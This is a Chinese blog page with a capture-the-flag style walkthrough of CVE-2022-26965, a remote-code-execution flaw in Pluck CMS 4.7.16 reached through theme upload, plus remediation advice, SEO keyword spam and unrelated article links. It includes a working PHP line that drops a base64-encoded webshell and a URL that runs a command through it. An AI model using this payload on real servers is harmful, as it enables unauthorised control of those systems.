当前位置: 首页 > news >正文

承德网站制作团购网站短信平台

承德网站制作,团购网站短信平台,wordpress访问不了,宗亲网站建设建议简介 CVE-2022-26965是Pluck CMS 4.7.16版本存在一个远程shell上传执行漏洞。 攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行,未经授权访问服务器,造成潜在的安全隐患。 过程 1.打开环境,查看源码,发现login.php 2.进…

简介

CVE-2022-26965是Pluck CMS 4.7.16版本存在一个远程shell上传执行漏洞

攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行,未经授权访问服务器,造成潜在的安全隐患。

过程

1.打开环境,查看源码,发现login.php

2.进入查看,登陆页面,弱口令admin进行登录,全英文界面,可以翻译的哈

3.找到上传cms主题界面

4.去github下载相对应的版本主题,随便下载一个就行

https://github.com/billcreswell/redline-theme

5.下载完成之后将文件里面的info.php里面的内容修改为下面的代码

<?phpfile_put_contents('testshell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg=='));?>

解释:使用file_put_contents函数将经过Base64解码后的字符串写入一个名为testshell.php的文件。

6.修改好的文件进行上传

文件上传成功。

7.连接

http://eci-2ze33y4rj8565dqp15iy.cloudeci1.ichunqiu.com/testshell.php?1=cat%20/flag

成功。

解决方案

这个漏洞的解决方案是升级Pluck CMS到最新版本或打上已知的修补程序。

攻击者利用该漏洞一般会执行一些恶意代码,包括上传一些特定的主题包,然后执行一些远程命令,从而获取服务器的控制权限,因此升级或打上修补程序是解决该漏洞最直接有效的方法。

除此之外,管理员还可以通过限制主题包的上传权限、对服务器进行安全扫描和加固等措施来提高系统的安全性。

http://www.yayakq.cn/news/495721/

相关文章:

  • 医院网站建设中标成都手机网站建设开发
  • php笔记网站青岛做外贸网站的公司简介
  • 电商网站现状分析怎么在wordpress建站
  • 全国房地产网站学游戏设计去哪个学校
  • 网站tdk标签linux 下载 wordpress命令
  • 网站建设的个人条件义乌商城集团的网站建设
  • 新东方在线koolearnseo于刷网站点击
  • mvc5 网站开发美學 pdf淘宝商城
  • 网站漂浮广告临沂做四维和美家网站
  • 外贸公司英文网站建设wordpress 收邮件发布
  • 网站素材wordpress 提交
  • 织梦做的网站好优化把excel做数据库分享成网站
  • 重庆网站产品推广深圳推广公司推荐
  • 图片类网站开发实验总结中铁建设门户网站
  • 展示网站动画怎么做的wordpress获取分类目录
  • 网站怎么做实名认证教做衣服的网站有哪些
  • 注册域名之后如何做网站u8无可用数据源
  • 怎么做动漫小广告视频网站中国黄页免费版
  • 天猫网站左侧菜单向右滑出的导航菜单搜索引擎网站有哪些
  • 商城用什么系统做网站wordpress vc编辑器
  • 怎么做网站投放adsensewordpress方向
  • 网站域名如何使用方法wordpress 即时预约
  • 论述题亿唐网不做网站做品牌青岛 制作网站 大点的公司
  • 网站全站搜索代码福州网站建设策划
  • 自己做网站做什么内容徐州住房和城乡建设局网站
  • 贵阳网站建设 赶集wordpress vps 安装
  • 网站底部流程网站登陆界面模板
  • 西安做网站陕西必达微信小程序推广软件
  • 泰安公司网站建设湖南做电商网站需要什么条件
  • 兰州产品营销网站建设徐州铜山区建设局网站